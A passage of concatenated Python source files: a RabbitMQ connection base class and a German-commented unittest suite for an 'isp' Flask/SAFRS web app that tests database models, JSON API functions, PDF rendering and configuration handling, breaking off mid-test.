email.html = consumer_mail
mail.send(email)
return True
|
Rabbit_Base.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2017 In-Q-Tel, Inc, All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
''' Created on 21 August 2017
@author: dgrossman
'''
import pika
import threading
import time
from functools import partial
from .Logger_Base import Logger
module_logger = Logger
class Rabbit_Base(object): # pragma: no cover
'''
Base Class for RabbitMQ
'''
def __init__(self):
self.logger = module_logger.logger
def make_rabbit_connection(self, host, port, exchange, queue_name, keys,
total_sleep=float('inf')): # pragma: no cover
'''
Connects to rabbitmq using the given hostname,
exchange, and queue. Retries on failure until success.
Binds routing keys appropriate for module, and returns
the channel and connection.
'''
wait = True
do_rabbit = True
rabbit_channel = None
rabbit_connection = None
while wait and total_sleep > 0:
try:
rabbit_connection = pika.BlockingConnection(
pika.ConnectionParameters(host=host, port=port))
rabbit_channel = rabbit_connection.channel()
rabbit_channel.exchange_declare(exchange=exchange,
exchange_type='topic')
rabbit_channel.queue_declare(queue=queue_name, exclusive=False)
self.logger.debug('connected to {0} rabbitmq...'.format(host))
wait = False
except Exception as e:
self.logger.debug(
'waiting for connection to {0} rabbitmq...'.format(host))
self.logger.debug(str(e))
time.sleep(2)
total_sleep -= 2
wait = True
if wait:
do_rabbit = False
if isinstance(keys, list) and not wait:
for key in keys:
self.logger.debug(
'array adding key:{0} to rabbitmq channel'.format(key))
rabbit_channel.queue_bind(exchange=exchange,
queue=queue_name,
routing_key=key)
if isinstance(keys, str) and not wait:
self.logger.debug(
'string adding key:{0} to rabbitmq channel'.format(keys))
rabbit_channel.queue_bind(exchange=exchange,
queue=queue_name,
routing_key=keys)
return rabbit_channel, rabbit_connection, do_rabbit
def start_channel(self, channel, mycallback, queue, m_queue):
''' handle threading for messagetype '''
self.logger.debug('about to start channel {0}'.format(channel))
channel.basic_consume(partial(mycallback, q=m_queue), queue=queue,
no_ack=True)
mq_recv_thread = threading.Thread(target=channel.start_consuming)
mq_recv_thread.start()
return mq_recv_thread
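# Minimal usage sketch (broker address, exchange and key names are placeholders; the
# callback signature follows the pre-1.0 pika basic_consume convention used above,
# and `queue.Queue()` assumes `import queue`):
#
#   def on_message(channel, method, properties, body, q=None):
#       q.put(body)
#
#   rabbit = Rabbit_Base()
#   channel, connection, ok = rabbit.make_rabbit_connection(
#       'localhost', 5672, 'topic_exchange', 'my_queue', ['my.routing.key'])
#   if ok:
#       recv_thread = rabbit.start_channel(channel, on_message, 'my_queue', queue.Queue())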
|
test_isp.py
|
# -*- coding: utf-8 -*-
"""
Check all classes and functions contained in isp.
All runtime error messages are intentional during the test run.
After execution, OK is printed at the end if all tests were carried out.
If any of the checks fail, the output ends with::
======================================================================
FAIL:
.......
FAILED (failures=x)
"""
import os
from os import path as osp
# make the modules reachable from the console as well
ABSPATH = os.path.dirname( os.path.abspath( __file__) )
path = osp.join( ABSPATH , "..")
import sys
sys.path.insert(0, path)
import shutil
from shutil import copyfile
#print(sys.path)
import unittest
import json
import time
from datetime import datetime
import warnings
warnings.filterwarnings("ignore")
import pandas as pd
import io
import matplotlib.pyplot as plt
from skimage import io as img_io
from skimage.util import compare_images
import numpy as np
from flask import Response
import dotmap
import threading
from safrs import jsonapi_rpc
from isp.config import ispConfig, dict_merge
from isp.webapp import ispBaseWebApp
from isp.safrs import db, system, ispSAFRSModel, ispSAFRSDummy, iso2date, isoDateType, isoDateTimeType
from isp.mpdf import PdfGenerator
from isp.plot import plotClass, rcParams
from sqlalchemy import MetaData
import logging
logger = logging.getLogger()
# the test/files folder
files_path = os.path.join( ABSPATH, 'files')
if not os.path.exists( files_path ):
try:
os.makedirs( files_path )
except IOError as e:
print("Unable to create dir.", e)
# weasyprint logging
wp_log_file = os.path.join(files_path, 'weasyprint.log')
if os.path.exists( wp_log_file ):
os.remove( wp_log_file )
wp_logger = logging.getLogger('weasyprint')
wp_logger.addHandler( logging.FileHandler( wp_log_file ) )
wp_logger.setLevel( logging.CRITICAL ) # WARNING, CRITICAL
class dummy( ispSAFRSDummy ):
"""
    description: Tests - test of ispSAFRSDummy
---
"""
__tablename__ = "dummy"
_database_key = ""
config = None
metadata = MetaData()
@classmethod
def init(self, kwargs:dict={} ):
"""
        Called by the jsonapi_rpc functions
Parameters
----------
kwargs : dict, optional
DESCRIPTION. The default is {}.
Returns
-------
kwargs : TYPE
DESCRIPTION.
"""
return kwargs
@jsonapi_rpc( http_methods=['GET'] )
def api_list(cls, **kwargs):
"""
        summary : all entries
        description: all entries
parameters:
- name : _ispcp
type: OrderedMap
in : query
default : {}
description : zusätzliche parameter
----
{'data': [{
'attributes': { }
'id': '1',
'links': {'self': 'http://localhost/api/dbtests/1/'},
'type': 'dbtests'
}]
'included': [],
'jsonapi': {'version': '1.0'},
'links': {'self': 'http://localhost/api/dbtests/?page[offset]=0&page[limit]=250'},
'meta': {'count': 7, 'limit': 250, 'offset': 0},
'App-Error': [],
'App-Info': []
}
        actual:
{'data': [{
'function': 'api_list',
'kwargs': {'_ispcp': {}}
}],
'included': [],
'jsonapi': {'version': '1.0'},
'meta': {'count': 0, 'limit': 250, 'offset': 0},
'App-Error': [],
'App-Info': [{'message': 'safrs', 'info': 'Funktion: __main__.dummy.api_list()'}, {'message': 'kwargs', 'info': {'_ispcp': {}}}]}
        missing:
links
"""
#print("dummy.api_list")
cls.appInfo("kwargs", kwargs )
_result = [ {
"attributes": { "function": "api_list", "kwargs" : kwargs },
"id":"12",
"links": {"self": "http://localhost/api/dummy/12/"}, # autom. erzeugen
"type": "dummy" # autom. erzeugen
} ]
return cls._int_json_response( { "data": _result } )
@jsonapi_rpc( http_methods=['GET'] )
def api_get(cls, **kwargs):
"""
        summary : one entry
        description: one entry
parameters:
- name : Id
in : path
type: integer
required : true
description : id - der Informationen
- name : _ispcp
type: OrderedMap
in : query
default : {}
description : zusätzliche parameter
----
{'data': {
'attributes': {},
'id': '7',
'links': {'self': 'http://localhost/api/dbtests/7/'},
'type': 'dbtests'
},
'included': [],
'jsonapi': {'version': '1.0'},
'links': {'self': 'http://localhost/api/dbtests/7/'},
'meta': {'count': 1, 'instance_meta': {}, 'limit': 250, 'offset': 0},
'App-Error': [],
'App-Info': []
}
"""
#print("dummy.api_get")
# log.warning("gqa.api_get: {} id:{}".format( json.dumps(kwargs), cls.object_id ) )
cls.appInfo("kwargs", kwargs )
        # normally there is no record in the database
if kwargs[cls._s_object_id] == "gibtsnicht":
_result = cls._int_get_empty_record( {"attributes": {cls._s_object_id : kwargs[cls._s_object_id] } })
else:
_result = {
"attributes": {cls._s_object_id : kwargs[cls._s_object_id] },
"id": 12,
"links": {"self": "http://localhost/api/{}/{}/".format(cls.__name__, 12)}, # autom. erzeugen
"type": cls.__name__ # autom. erzeugen
}
return cls._int_json_response( { "data": _result } )
@classmethod
@jsonapi_rpc( http_methods=['GET'] )
def test( cls, **kwargs ):
"""
        description: test of api functions and parameters
parameters:
- name : _ispcp
in : query
default : {}
description : zusätzliche parameter
type: object
- name : zahl
in : query
required : true
description : Eine Zahl
type: number
- name : bool
in : query
required : false
default : false
description : Eine boolean Wert
type: boolean
- name : text
in : query
required : false
default : typenlos
description : Eine typenloser Wert mit default
----
"""
#import sqlalchemy
cls.appInfo("kwargs", kwargs )
_result = kwargs
        # different return values
if kwargs["zahl"] == 1:
            # empty list
result = []
elif kwargs["zahl"] == 2:
            # list with one element
result = [ {"a":1, "b":2} ]
elif kwargs["zahl"] == 3:
            # list with one element
result = cls._int_json_response( "kein result" )
elif kwargs["zahl"] == 4:
            # internal checks
cls._int_add_meta( info= "{\"is\":\"dict\"}" )
result = []
elif kwargs["zahl"] == 5:
cls._int_parse_args( )
result = []
elif kwargs["zahl"] == 6:
result = cls._int_query( [ { "A":1 }, { "B":2 } ] )
elif kwargs["zahl"] == 7:
result = cls._int_groupby_query( cls._s_query, { "A":1, "B":2 } )
elif kwargs["zahl"] == 8:
result = []
db = cls.access_cls( "nicht da" )
result.append( {"nicht da": ""} )
db = cls.access_cls( "BigInteger" )
result.append( {"sqlalchemy.BigInteger": ""} )
elif kwargs["zahl"] == 9:
result = [
{'test=None': iso2date(None) },
{'20180415=2018-04-15': iso2date('20180415', True) },
{'2018-04-15=2018-04-15': iso2date('2018-04-15', True) },
{'2018-04-15 14:36:25=2018-04-15': iso2date('2018-04-15 14:36:25', True) },
{'2018-04-15=18-04-15 00:00:00': iso2date('2018-04-15') },
{'2018-04-15 14:36:25=2018-04-15 14:36:25': iso2date('2018-04-15 14:36:25') },
{'20180415 14:36:25=2018-04-15 14:36:25': iso2date('20180415 14:36:25') },
{'20180415 14:36=2018-04-15 14:36:00': iso2date('20180415 14:36') },
{'201A0415 14:36:25=None': iso2date('201A0415 14:36:25') },
{'201A0415 14:36=None': iso2date('201A0415 14:36') },
{'201A0415=None': iso2date('201A0415') },
]
else:
# dict
result = cls._int_json_response( { "data": _result } )
return result
@classmethod
@jsonapi_rpc( http_methods=['GET'] )
def pdf( cls, **kwargs ):
'''
        description: test of pdf functions and parameters
parameters:
- name : _ispcp
in : query
default : {}
description : zusätzliche Json parameter
type: object
- name : name
in : query
required : false
default : nofile
description : Name der PDF Datei bestimmt die Art der pdf Erzeugung
----
'''
cls.appInfo("kwargs", kwargs )
mimetype='text/html'
status = 200
        # different return values
if kwargs["name"] == "nofile":
status = 400
result = "Keine PDF Datei ({}.pdf) gefunden".format( kwargs["name"] )
cls.appError( "dummy/pdf", result)
            # error for the empty list
return Response(result, status=status, mimetype=mimetype)
pdfFile = "{}.pdf".format(kwargs["name"])
variables = {
"Klinik" : "MedPhyDO",
"Abteilung" : "App Skeleton",
"logo": "logo.png",
"Datenausgabe" : "16.03.2020",
"Titel" : "unittest",
"Betreff" : "PdfGenerator",
"Auswertung" : "mpdf Test auch mit langem Text",
"Erstelldatum": "",
"Erstellt_von": "",
"Geprüft_von": "",
"Gültig_ab": "",
"Freigegeben_von": "",
"tip": "mpdf test tip für die Erstellung eines Unittest mit verschiedenen Elementen und PDF Rückgabe ",
"Version" : "",
"path": osp.join( ABSPATH , "files", "pdf"),
}
# print(pdfFile)
        # prepare the contents
        # test files
test_resources = osp.join( ABSPATH , "resources" )
test_files = {
"alpha" : osp.join( test_resources, 'alphachannel.svg' ),
"python" : osp.join( test_resources, 'python.svg' ),
"text" : osp.join( test_resources, 'test_text.txt' ),
"markdown" : osp.join( test_resources, 'test_markdown.md' ),
"markdown1" : osp.join( test_resources, 'test_markdown1.md' ),
"markdown2" : osp.join( test_resources, 'test_markdown2.md' ),
"logo" : 'logo.png', # immer aus den normalen resources
}
# text
text = """
<h1>Lorem ipsum</h1>
Lorem ipsum dolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim veniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat.
<br>
<b>kleiner Blindtext</b>
Hallo. Ich bin ein kleiner Blindtext. Und zwar schon so lange ich denken kann. Es war nicht leicht zu verstehen, was es bedeutet, ein blinder Text zu sein: Man ergibt keinen Sinn. Wirklich keinen Sinn. Man wird zusammenhangslos eingeschoben und rumgedreht – und oftmals gar nicht erst gelesen.
Aber bin ich allein deshalb ein schlechterer Text als andere?
<br>
"""
# data
        # use pandas data
data = {
"A" : { "A" : 1, "B": 1.5, "C": "test", "D":-0.2 },
"B" : { "A" : 2, "B": 2.6, "C": "", "D": 1.2 },
"C" : { "A" : 3, "B": 3.2, "C": "test", "D": 0.4 },
"D" : { "A" : 4, "B": 4.1, "C": "", "D": -0.6 }
}
data_frame = pd.DataFrame(data)
        # swap rows and columns, and sort by C
data_frame = data_frame.transpose().sort_values(by="C", ascending=False)
        # for the tests set the font size to 10, otherwise 20 is used
rcParams["font.size"] = 10
# rcParams["figure.figsize"] = (6.4, 4.8)
        # set plt defaults
plt.rcParams.update( rcParams )
        # display the plot with pandas
data_frame.plot(kind='bar', title='Rating');
        # optimize the layout
plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
#plt.show()
image_data = io.BytesIO()
plt.savefig( image_data, format='png' )
#
# weasyprint
#
        # first with config settings only
pdf = PdfGenerator( config=ispConfig( mqttlevel=logging.WARNING ) )
        # now with the other arguments; the config is loaded internally
pdf = PdfGenerator( filename=pdfFile, variables=variables )
from isp.mpdf import DEFAULT_TEMPLATES
        # set the default templates again so that config changes are not used for the test
        # provide styles
pdf.PAGE_STYLE = DEFAULT_TEMPLATES["PAGE_STYLE"]
pdf.OVERLAY_STYLE = DEFAULT_TEMPLATES["OVERLAY_STYLE"]
        # provide the html skeleton
pdf.header_html = DEFAULT_TEMPLATES["header_html"]
pdf.footer_html = DEFAULT_TEMPLATES["footer_html"]
if kwargs["name"] == "test-1":
            # create an empty pdf
            # only run updateMetadata to check coverage
#pdf.updateMetadata( )
pass
elif kwargs["name"] == "test-2":
            # render simple text
pdf.textFile( test_files["text"], { "width": 80 })
            # tests the HTML output
pdf.html( '<b>HTML Test</b>', attrs={ "font-size":"9px" } )
            # render markdown
pdf.textFile( test_files["markdown"], { "width": 80 } )
elif kwargs["name"] == "test-2a":
            # like test 2, but markdown first and then text
            # render markdown
pdf.textFile( test_files["markdown"], { "width": 80 } )
            # tests the HTML output
pdf.html( '<b>HTML Test</b>', attrs={ "font-size":"9px" } )
            # render simple text
pdf.textFile( test_files["text"], { "width": 80 })
elif kwargs["name"] == "test-3":
            # page creation
c1 = pdf.setContentName("Seite 1")
pdf.text( "Inhalt 1" )
            # new content / new page
pdf.setContentName("Seite 2")
pdf.text( "Inhalt 2" )
pdf.newPage()
pdf.text( "Inhalt 3" )
pdf.newPage()
pdf.text( "<h2>Seite 4</h2>" )
pdf.text( "Inhalt 4" )
            # finally, insert something into content 1 on the first page
pdf.setContentName(c1, False)
pdf.text( "Inhalt 5 auf Seite 1" )
elif kwargs["name"] == "test-4":
icon_data = [
{ "acceptance": "True (5)", "icon": pdf.resultIcon( acceptance=True, iconOnly=True ) },
{ "acceptance": "False (1)", "icon": pdf.resultIcon( acceptance=False, iconOnly=True ) },
{ "acceptance": "1", "icon": pdf.resultIcon( acceptance=1, iconOnly=True ) },
{ "acceptance": "2", "icon": pdf.resultIcon( acceptance=2, iconOnly=True ) },
{ "acceptance": "3", "icon": pdf.resultIcon( acceptance=3, iconOnly=True ) },
{ "acceptance": "4", "icon": pdf.resultIcon( acceptance=4, iconOnly=True ) },
{ "acceptance": "5", "icon": pdf.resultIcon( acceptance=5, iconOnly=True ) },
{ "acceptance": "falsch", "icon": pdf.resultIcon( acceptance="falsch", iconOnly=True ) },
]
icon_frame = pd.DataFrame( icon_data )
            # render text
pdf.text( text, { "width": 80 }, attrs={"border":"1px solid #FF0000"})
            # use text from a file that does not exist
pdf.textFile( "gibtsnicht.md", { "width": 80 } )
            # use text from an existing file
pdf.textFile( test_files["text"], { "width": 40, "top": 130 }, attrs={"border":"1px solid #FF0000"} )
#
            # display the given image (svg)
pdf.image( test_files["alpha"], { "width": 50, "top":125, "left":60 }, attrs={"border":"1px solid #FF0000"} )
            # image from resources (png)
pdf.image( test_files["logo"] , { "width": 30, "top":55, "left":95 }, attrs={"border":"1px solid #FF0000"} )
            # image of a data_frame.plot, height set automatically from the content
img = '<div style="float:right;">'
img += pdf.image( image_data, { "width": 60 }, render=False)
img += "</div>"
pdf.html( img, { "width": 80, "top":80, "left":10 }, attrs={"border":"1px solid #FF0000"} )
            # pandas dataframe as a table
html = (
data_frame.round(2).style
.set_uuid( "test_pandas_" )
.set_table_attributes('class="alayout-fill-width"') \
.format( { 'A':'{0:.1f}', 'B':'{0:.1f}', 'D':'{0:.3f}'} )
.hide_index()
.highlight_max(subset=["D"], color='yellow', axis=0)
.render()
)
pdf.html( html, attrs={ "font-size":"9px", "margin-left": "10px" } )
            # without arguments (nothing happens)
pdf.pandas()
            # empty dataframe (nothing happens)
pdf.pandas( pd.DataFrame() )
            # pandas directly, without an id
pdf.pandas( data_frame,
area={ "width": 50, "top": 180 },
attrs={ "id": "test", "class":"unittest" }, # id des dataframe
fields=[
{ "field": "gibtsnicht" },
{ "field": "A", "label":"is A", "format":"{}", "style": [('text-align', 'center')] },
{ "field": "D", "format":"{0:.3f}", "style": [('text-align', 'right')] }
]
)
pdf.pandas( icon_frame,
area={ "width": 50, "top": 5, "right": 0 },
# attrs={ "id": "test", "class":"unittest" }, # id des dataframe
)
            # pandas directly, with an id
pdf.pandas( data_frame,
area={ "width": 50, "top": 180, "left": 60 },
fields=[
{ "field": "B", "label":"is B" },
{ "field": "D" }
]
)
            # pandas without matching fields
pdf.pandas( data_frame,
area={ "width": 50, "top": 180, "left": 120 },
fields=[
{ "field": "gibtsnicht" },
]
)
pdf.resultIcon( 1 )
            # new contentName (creates a page break)
pdf.setContentName("Seite 3")
            # use text from an existing file
pdf.textFile( test_files["markdown2"], { "width": 160 } )
            # insert empty text
pdf.text( )
            # insert text internally
pdf.text( 12 )
            # insert markdown internally
pdf.markdown( "* Markdown **List** Element" )
            # always force a page break
pdf.newPage()
pdf.resultIcon( 5 )
            # new page
pdf.text( "Seite 3" )
            # without arguments (nothing happens)
pdf.pandasPlot()
            # plot with arguments at the given size
pdf.pandasPlot( data_frame, area={ "width": 100, "top": 30, "left": 20 }, kind='line', rot=75 )
            # text and a TeX formula rendered to SVG with mathtext
pdf.mathtext( r"$a/b$" )
            # only generate the html code for a new page
pdf.newPage( False )
            # simply an icon to check the fonts
pdf.icon( "mdi-paperclip", "x4")
            # plot functions via the plotClass
            # create the plot
plot = plotClass( )
fig, ax = plot.initPlot( )
            # limits, legend and grid
ax.set_ylim( [-2.0, 2.0] )
ax.grid( )
ax.legend( )
            # output as a bar plot
data_frame.plot( ax=ax, kind='bar', rot=75)
plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)
            # display the chart in the PDF
pdf.image( plot.getPlot(), area={ "width": 100, "top": 130, "left": 20 } )
# close all figures
plt.close('all')
            # run showPlot just for coverage
plot.showPlot()
if kwargs["name"] == "test-1":
#
            # run finish (coverage test)
#
            # 1. only generate the pdf
result = pdf.finish( )
pdf._variables["unittest"] = True
            # 2. generate pdf and png as a unittest (like render_pdf_and_png)
result = pdf.finish( )
else:
#
            # create the pdf and png files
#
result = pdf.render_pdf_and_png( )
#
            # create the pdf and png files
#
result = pdf.render_pdf_and_png( )
return cls._int_json_response( { "data": result } )
@classmethod
#@jsonapi_rpc( http_methods=['GET'] )
def norpc( cls, **kwargs ):
'''
'''
return ""
class dbtestsrel( ispSAFRSModel ):
"""
    description: Tests - tests of ispSAFRSModel with relations
---
"""
__table_args__ = {'extend_existing': True}
__tablename__ = "dbtestsrel"
id = db.Column('id', db.Integer, primary_key=True, unique=True, autoincrement=True)
dbtests_id = db.Column( 'dbtests_id', db.Integer, db.ForeignKey("dbtests.id") )
rstring = db.Column('rstring', db.String, nullable=False) #
rdate = db.Column('rdate', db.Date, nullable=True) # YYYYMMDD
rinteger = db.Column('rinteger', db.Integer, nullable=True)
rdata = db.Column('rdata', db.JSON ) # .. todo::json type?
    # relations
dbtests = db.relationship("dbtests", back_populates="dbtestsrel", foreign_keys=[dbtests_id]) # one to many
class dbtests( ispSAFRSModel ):
"""
    description: Tests - tests of ispSAFRSModel with relations
---
    everything is always stored in full in the database
Specify 'extend_existing=True' to redefine options and columns on an existing Table object.
    Numeric, also DECIMAL
precision=None,
scale=None,
decimal_return_scale=None,
        asdecimal=True - a formatted (rounded) string is returned
db.Float( precision=5, asdecimal=True, decimal_return_scale=4 )
"""
__table_args__ = {'extend_existing': True}
__tablename__ = "dbtests"
id = db.Column('id', db.Integer, primary_key=True, unique=True, autoincrement=True)
string = db.Column('string', db.String, nullable=False) #
date = db.Column('date', db.Date, nullable=True) # YYYYMMDD
isodatetime = db.Column('isodatetime', isoDateTimeType, nullable=True) # YYYY-MM-DD HH:mm:SS
isodate = db.Column('isodate', isoDateType, nullable=True) # YYYY-MM-DD
integer = db.Column('integer', db.Integer, nullable=True)
data = db.Column('data', db.JSON ) # .. todo::json type?
tags = db.Column('tags', db.String, nullable=True)
gruppe = db.Column('gruppe', db.String, nullable=True)
aktiv = db.Column('aktiv', db.Integer, nullable=False, default=True)
float = db.Column('float', db.Float( asdecimal=True ), nullable=False, default=0) # (5,True,4) gibt 0.3333 als str
decimal = db.Column('decimal', db.DECIMAL( 5, 2, 1, True ), nullable=False, default=0)
numeric = db.Column('numeric', db.Numeric( 5, 2, 3, False ), nullable=False, default=0 )
    # relations
dbtestsrel = db.relationship("dbtestsrel", back_populates="dbtests", foreign_keys=[dbtestsrel.dbtests_id], lazy="dynamic", cascade="delete") # one to many
def to_dict(self):
        # with asdecimal=True a str is returned, so convert it back to float
result = ispSAFRSModel.to_dict(self)
result["decimal"] = float( result["decimal"] )
#print( result )
return result
@classmethod
@jsonapi_rpc( http_methods=['GET'] )
def test( cls, **kwargs ):
"""
        description : additional function
parameters:
- name : _ispcp
in : query
default : {}
description : zusätzliche parameter
type: object
- name : zahl
in : query
required : true
description : Eine Zahl
type: number
- name : bool
in : query
required : false
default : false
description : Ein boolean Wert
type: boolean
- name : text
in : query
required : false
default : typenlos
description : Ein typenloser Wert mit default
----
"""
#print( cls.object_id )
cls.appDialog("dbtests", { "content" : " test Dialog", "dimensions" : [ 500, 200] })
result = []
#_result = kwargs
if kwargs["zahl"] == 8:
# Datenbank Klasse bestimmen
db = cls.access_cls( "dbtests" )
else:
result = cls._int_get_empty_record( {"tags": "defaulttag"} )
cls.appInfo("kwargs", kwargs, status_code=205 )
return cls._int_json_response( { "data": result } )
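# A minimal, stdlib-only sketch of the rounding behaviour described in the
# dbtests docstring above: with scale=2 (as on the db.DECIMAL( 5, 2, ... ) column)
# a value like 1.2345 comes back rounded to 1.23, and to_dict() turns the rounded
# value back into a float. Illustration only - it is not used by the tests.
def _decimal_rounding_sketch( value=1.2345, scale=2 ):
    from decimal import Decimal, ROUND_HALF_UP
    quantum = Decimal(1).scaleb( -scale )             # scale=2 -> Decimal('0.01')
    rounded = Decimal( str( value ) ).quantize( quantum, rounding=ROUND_HALF_UP )
    return rounded, float( rounded )                  # (Decimal('1.23'), 1.23)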
def run( config:dict={} ):
''' Starts ispBaseWebApp with additional config settings
Parameters
----------
config : dict, optional
Additional configuration merged into the default config. The default is {}.
Returns
-------
webApp : ispBaseWebApp
The started WebApplication
'''
# Konfiguration öffnen
_config = ispConfig( config=config )
# _config.update( config )
#print( _config )
_apiConfig = {
"models": [ system, dummy, dbtests, dbtestsrel ],
}
_webconfig = {
# nur um update von webconfig zu testen
"name" : "test_isp",
}
# Webserver starten
webApp = ispBaseWebApp( _config, db, webconfig=_webconfig, apiconfig=_apiConfig )
return webApp
class testBase(unittest.TestCase):
'''
setUp(), tearDown(), and __init__() will be called once per test.
'''
@classmethod
def setUpClass(cls):
''' Called when the test class is initialised
- provide the api
- load test results for comparison
'''
# This attribute controls the maximum length of diffs output by assert methods that report diffs on failure.
# It defaults to 80*8 characters
cls.maxDiff = None
files_path = os.path.join( ABSPATH, 'files')
pdf_path = os.path.join( ABSPATH, 'files', 'pdf')
config_path = os.path.join( ABSPATH, '..', 'config')
if not os.path.exists( files_path ):
os.mkdir( files_path )
# alte Datenbank löschen: über Pfad Angaben falls in der config nicht die testdatei steht
db_file = os.path.join( files_path, "tests.db" )
if os.path.exists( db_file ):
os.remove( db_file )
# alle erzeugten pdf und den Pfad pdf löschen
if os.path.exists( pdf_path ):
shutil.rmtree( pdf_path )
swagger_file = os.path.join( files_path, "swagger_test.json" )
if not os.path.exists( swagger_file ):
with open(swagger_file, 'w') as fp:
obj = {
"info": {
"title": "swagger test"
}
}
json.dump(obj, fp, indent=2)
# webapp with unittest config
cls.webapp = run( {
"loglevel" :{
"safrs" : logging.DEBUG
#"webapp" : logging.INFO,
},
"server" : {
"webserver" : {
"name" : "swagger_test",
"port" : 5001,
"TESTING": True,
"reloader" : False
},
"api": {
"DBADMIN": True,
"custom_swagger_config": os.path.join( files_path, "swagger_test.json" )
}
},
"templates":{
"PDF-HEADER": None
},
"database": {
"main": "tests",
"tests" : {
"connection": "sqlite:///{{BASE_DIR}}/tests/files/tests.db"
}
}
} )
cls.app = cls.webapp.app
#print("setUpClass", cls.webapp.config.get() )
# Grunddaten in die Datenbank laden
data = {
"dbtests" : [
{ "string": "eins", "integer": 1, "gruppe":"A", "tags":"A,K", "aktiv":True },
{ "string": "zwei", "integer": 2, "gruppe":"B", "tags":"B,M", "aktiv":False },
{ "string": "drei", "integer": 3, "gruppe":"C", "tags":"M,K", "aktiv":True },
{ "string": "vier", "integer": 4, "gruppe":"C", "aktiv":False },
{ "string": "fünf", "integer": 5, "gruppe":"B", "tags":"A,K", "aktiv":True }
],
"dbtestsrel" : [
{ "dbtests_id": "1", "rstring": "r_eins", "rinteger": 11 },
{ "dbtests_id": "2", "rstring": "r_zwei", "rinteger": 12 },
{ "dbtests_id": "3", "rstring": "r_drei", "rinteger": 13 },
{ "dbtests_id": "4", "rstring": "r_vier", "rinteger": 14 },
{ "dbtests_id": "5", "rstring": "r_fünf", "rinteger": 15 }
]
}
for d in data["dbtests"]:
response = cls.app.post( "api/dbtests/", headers={'Content-Type': 'application/json'}, data=json.dumps({
"data": {
"attributes": d,
"type":"dbtests"
}
}))
for d in data["dbtestsrel"]:
response = cls.app.post( "api/dbtestsrel/", headers={'Content-Type': 'application/json'}, data=json.dumps({
"data": {
"attributes": d,
"type":"dbtestsrel"
}
}))
@classmethod
def tearDownClass(cls):
"""
config unittest file löschen
"""
#os.remove( cls.unitest_file )
pass
def setUp(self):
''' wird vor jedem test aufgerufen
'''
pass
def tearDown(self):
''' wird nach jeden test aufgerufen
Returns
-------
None.
'''
#self.app.
# close the browser window
#self.driver.quit()
pass
class ispTest( testBase ):
def test_config_mqtt(self):
'''Check isp.config ispConfig with MQTTHandler (isp.mqtt); always run with a fresh kernel for mqttInitLogging
'''
# zuerst ohne parameter aufrufen
config = ispConfig( )
# __repr__ testen soll nicht die Klasse sondern die config selbst (dotmap) geben
self.assertEqual(
repr(config)[:7], 'DotMap(' , "Fehler beim laden __repr__")
# Magic Methods prüfen
self.assertEqual(
config.__dict__["_loadErrors"], [], "Fehler beim laden von _loadErrors")
self.assertEqual(
config._loadErrors, [], "__getitem__ Fehler bei vorhandenen _loadErrors im Object")
self.assertEqual(
type(config.test), dotmap.DotMap, "__getitem__ Fehler bei nicht vorhandenen in der config")
# __getattr__ wird bei nicht vorhandenen aufgerufen
self.assertEqual(
config._test, None, "__getitem__ Fehler bei nicht vorhandenen im Object")
# __getitem__
self.assertEqual(
config["_loadErrors"], [], "__getitem__ Fehler")
# __getitem__
self.assertEqual(
type(config["versions"]), dotmap.DotMap, "__getitem__ mit dotmap Fehler")
# __getattr__ mit dotmap (config Values)
self.assertEqual(
type(config.versions), dotmap.DotMap, "__getattr__ mit dotmap Fehler")
# __setitem__
config["_version"] = '2.unittest' # __setitem__
self.assertEqual(
config.__dict__["_version"], '2.unittest', "__setitem__ Fehler")
# __setitem__ mit dotmap (config Values)
config["unittest"] = '3.unittest' # __setitem__
self.assertEqual(
config.unittest, '3.unittest', "__setitem__ mit dotmap Fehler")
# __setattr__
config._version = '3.unittest' # __setattr__
self.assertEqual(
config.__dict__["_version"], '3.unittest', "__setattr__ Fehler")
# accesses to the config itself
#
# komplette config als dict
self.assertEqual(
type( config.get() ), dict, "komplette config als dict")
# config get mit default
self.assertEqual(
config.get("gibtsnicht", "defaultValue"), 'defaultValue', "config get mit default")
# dotmap set oberste ebene
config._config["unittest"] = '4.unittest'
self.assertEqual(
config.get("unittest") , '4.unittest', "dotmap get auf erster ebene")
# dotmap set/get auf einer ebene
config._config.A.unittest = '4A.unittest'
self.assertEqual(
config.get("A.unittest") , '4A.unittest', "dotmap get auf zweiter ebene")
config._config.A.B.unittest = '4AB.unittest'
self.assertEqual(
config.get( ["A", "B", "unittest"] ) , '4AB.unittest', "dotmap get auf dritter ebene")
# dotmap set oberste ebene
config.set("5unittest", '5-unittest')
# dotmap get
self.assertEqual(
config.get("5unittest"), '5-unittest', "dotmap set auf erster ebene anlegen")
# dotmap set oberste ebene überschreiben
config.set("5unittest", '5a-unittest')
# dotmap get
self.assertEqual(
config.get("5unittest"), '5a-unittest', "dotmap set auf erster ebene ändern")
# dotmap set zweite ebene
config.set("B5.unittest", '5B-unittest')
# dotmap get
self.assertEqual(
config.get("B5.unittest"), '5B-unittest', "dotmap set auf zweiter ebene")
# dotmap set zweite ebene als list
config.set(["C5","unittest"], '5C-unittest')
# dotmap get
self.assertEqual(
config.get(["C5","unittest"]), '5C-unittest', "dotmap set/get auf zweiter ebene als list")
# dotmap set zweite ebene neues Element
config.set("B5.unittestA", '5B-unittest')
self.assertEqual(
config.get("B5").toDict(), {'unittest': '5B-unittest', 'unittestA': '5B-unittest'}, "dotmap set zweite ebene neues Element")
# hilfsfunktion dict_merge testen
a = {"A":1}
b = {"B":2}
c = dict_merge(a, b)
self.assertEqual(
c, {'A': 1, 'B': 2}, "dict_merge auch neue keys")
c = dict_merge(a, b, False)
self.assertEqual(
c, {'A': 1}, "dict_merge nur vorhandene keys")
# test in config setzen update prüfen
#
localtime = time.strftime("%Y%m%d %H:%M:%S.%f", time.localtime(time.time()) )
config.test = {"a":1, "time": localtime }
# a verändern
config.update( {
